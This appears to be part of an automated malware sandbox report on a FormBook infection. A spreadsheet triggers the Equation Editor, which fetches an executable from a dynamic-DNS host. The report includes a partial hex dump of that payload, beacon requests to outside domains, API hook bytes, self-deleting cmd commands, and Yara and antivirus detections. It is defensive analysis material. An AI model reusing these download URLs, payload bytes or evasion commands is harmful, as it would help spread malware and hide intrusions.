                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.2249165103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Nov 20, 2020 11:23:46.787297010 CET0OUTGET /worksdoc/svchost.exe HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                Host: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 20, 2020 11:23:47.007692099 CET2INHTTP/1.1 200 OK
                                                                                                                                                Date: Fri, 20 Nov 2020 10:23:44 GMT
                                                                                                                                                Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                Last-Modified: Thu, 19 Nov 2020 21:43:46 GMT
                                                                                                                                                ETag: "92600-5b47c9f64afa6"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 599552
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 e7 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1e 09 00 00 06 00 00 00 00 00 00 de 3d 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 55 96 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 3d 09 00 4f 00 00 00 00 40 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 1d 09 00 00 20 00 00 00 1e 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 09 00 00 04 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 88 9d 08 00 04 a0 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 98 2b 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 3f 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7b 63 00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_= @@ U@=O@B` H.text `.rsrcB@ @@.reloc`$@B=Hq+abdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r?p*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{o


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.224916691.195.241.13780C:\Windows\explorer.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Nov 20, 2020 11:24:55.913090944 CET636OUTGET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1
                                                                                                                                                Host: www.pestigenix.com
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:
                                                                                                                                                Nov 20, 2020 11:24:55.956897974 CET637INHTTP/1.1 302 Found
                                                                                                                                                date: Fri, 20 Nov 2020 10:24:55 GMT
                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                content-length: 0
                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NAnNDwyJzoYm1RRySDngvvHUFtvgQ2obU/nMiHo+KjE4OG0hZk4DAqRZfsqVz6DfJjgTkeN2ab0W7fbLhn4rdw==
                                                                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                last-modified: Fri, 20 Nov 2020 10:24:55 GMT
                                                                                                                                                location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=pestigenix.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                                                                                x-cache-miss-from: parking-787d9d44d9-l79rg
                                                                                                                                                server: NginX
                                                                                                                                                connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.2249167180.215.92.8080C:\Windows\explorer.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Nov 20, 2020 11:25:16.686966896 CET638OUTGET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1
                                                                                                                                                Host: www.atlanticdentallab.com
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:
                                                                                                                                                Nov 20, 2020 11:25:17.932526112 CET638INHTTP/1.1 302 Found
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Location: /waf_verify.htm
                                                                                                                                                Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                X-Powered-By: Nginx
                                                                                                                                                Date: Fri, 20 Nov 2020 10:24:14 GMT
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Code Manipulations

                                                                                                                                                User Modules

                                                                                                                                                Hook Summary

                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                                                                GetMessageAINLINEexplorer.exe

                                                                                                                                                Processes

                                                                                                                                                Process: explorer.exe, Module: USER32.dll
                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1
                                                                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: EXCEL.EXE PID: 2300 Parent PID: 584

                                                                                                                                                General

                                                                                                                                                Start time:11:22:56
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x13f650000
                                                                                                                                                File size:27641504 bytes
                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: EQNEDT32.EXE PID: 2332 Parent PID: 584

                                                                                                                                                General

                                                                                                                                                Start time:11:23:16
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:543304 bytes
                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: vbc.exe PID: 2816 Parent PID: 2332

                                                                                                                                                General

                                                                                                                                                Start time:11:23:19
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\Public\vbc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                Imagebase:0xfe0000
                                                                                                                                                File size:599552 bytes
                                                                                                                                                MD5 hash:429BBA6DBE159C300679509BE3085665
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 33%, ReversingLabs
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: RegAsm.exe PID: 2884 Parent PID: 2816

                                                                                                                                                General

                                                                                                                                                Start time:11:23:24
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                File size:64672 bytes
                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: RegAsm.exe PID: 2464 Parent PID: 2816

                                                                                                                                                General

                                                                                                                                                Start time:11:23:24
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                File size:64672 bytes
                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: cmd.exe PID: 2468 Parent PID: 2816

                                                                                                                                                General

                                                                                                                                                Start time:11:23:26
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
                                                                                                                                                Imagebase:0x4a2b0000
                                                                                                                                                File size:302592 bytes
                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: explorer.exe PID: 1388 Parent PID: 2464

                                                                                                                                                General

                                                                                                                                                Start time:11:23:27
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                File size:3229696 bytes
                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: choice.exe PID: 2368 Parent PID: 2468

                                                                                                                                                General

                                                                                                                                                Start time:11:23:27
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                Imagebase:0x970000
                                                                                                                                                File size:29696 bytes
                                                                                                                                                MD5 hash:11DDFBF834BB2C6F4D23297D80EE9E45
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: NETSTAT.EXE PID: 2832 Parent PID: 1388

                                                                                                                                                General

                                                                                                                                                Start time:11:23:37
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Imagebase:0xff0000
                                                                                                                                                File size:27136 bytes
                                                                                                                                                MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate

                                                                                                                                                Analysis Process: cmd.exe PID: 2220 Parent PID: 2832

                                                                                                                                                General

                                                                                                                                                Start time:11:23:43
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
                                                                                                                                                Imagebase:0x4ab10000
                                                                                                                                                File size:302592 bytes
                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >